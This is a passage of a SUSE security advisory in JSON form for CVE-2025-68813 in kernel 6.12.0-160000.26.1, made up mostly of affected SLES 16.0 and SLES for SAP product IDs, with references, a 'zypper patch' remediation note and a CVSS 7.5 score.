"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68813",
"url": "https://www.suse.com/security/cve/CVE-2025-68813"
},
{
"category": "external",
"summary": "SUSE Bug 1256641 for CVE-2025-68813",
"url": "https://bugzilla.suse.com/1256641"
},
{
"category": "external",
"summary": "SUSE Bug 1256644 for CVE-2025-68813",
"url": "https://bugzilla.suse.com/1256644"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
